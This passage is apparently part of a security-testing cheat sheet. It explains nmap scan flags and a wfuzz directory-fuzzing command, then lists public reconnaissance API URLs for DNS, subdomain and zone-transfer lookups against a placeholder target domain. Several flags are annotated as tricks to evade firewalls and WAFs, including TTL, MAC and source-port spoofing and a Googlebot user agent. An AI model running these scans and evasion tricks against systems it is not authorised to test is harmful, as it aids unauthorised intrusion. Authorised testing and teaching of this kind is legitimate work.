--open :: Show open ports.
--reason :: Shows the reason each port is set to a specific state and the reason each host is up or down.
--ttl=128 :: Tricks the target/firewalls into thinking the scan is coming from a Windows host.
-sV :: Service/version detection: probes the open ports found by -sS to identify the service and version running on them.
--top-ports=20 :: Scan 20 most common ports (Can be set to any number).
--min-rate=2000 :: Send packets no slower than 2000 per second.
-T3 :: Timing template set to normal (the default).
--spoof-mac=google :: Spoof MAC address.
-g443 :: Spoof source port number.
--script="not intrusive" :: Loads every script except for those in the intrusive category.
-oN :: Output the results to a file named resultados.txt
wFuzz (man)
- wFuzz is a web application fuzzing tool.
- You can find awesome wordlists here
sudo wfuzz --hc 404,400,302,301 -u https://site.com/FUZZ -w WORDLIST.txt -H "User-Agent: Googlebot-News" -t 50
--hc :: Ignore 404, 400, 302 and 301 status codes.
-u :: Url with the FUZZ param where the program shall do the fuzzing.
-w :: Using a wordlist.
-H :: Trying to trick the WAF with a Google-bot user agent.
-t :: Using 50 threads.
- APIs for a variety of target reconnaissance!
- Tip: Can be used with cURL to make automated tools using shell/bash script.
- Replace URL.COM with your target's domain.
The purpose of an API (Application Programming Interface) is to facilitate communication between software. APIs provide a format for applications and devices to talk to one another and exchange data in response to commands. This request/response pair is a fundamental component of an API.
https://api.hackertarget.com/dnslookup/?q=URL.COM
https://api.threatminer.org/v2/domain.php?q=URL.COM&rt=5
https://api.hackertarget.com/findshareddns/?q=URL.COM
https://api.hackertarget.com/reversedns/?q=URL.COM
https://api.hackertarget.com/zonetransfer/?q=URL.COM
https://dns.google.com/resolve?name=URL.com&type= (TXT,MX,AAAA,A,CNAME,NS,SOA,PTR,SPF,SRV... etc)
https://api.hackertarget.com/hostsearch/?q=URL.COM
https://sonar.omnisint.io/subdomains/URL.COM
https://jldc.me/anubis/subdomains/URL.COM
https://riddler.io/search/exportcsv?q=pld:URL.com
- The Alien Vault limit parameter can be set to any integer, as can the page parameter.
- Common Crawl outputs in JSON format.
https://otx.alienvault.com/api/v1/indicators/hostname/URL.COM/url_list?limit=50&page=1
https://index.commoncrawl.org/CC-MAIN-2021-43-index?url=URL.COM&output=json
https://api.hackertarget.com/nmap/?q=URL.COM
https://urlscan.io/api/v1/search/?q=domain:URL.COM&size=10000
NobodyKnows :: Base creator of the Nmap command
Me :: Making it look cool & easy! :)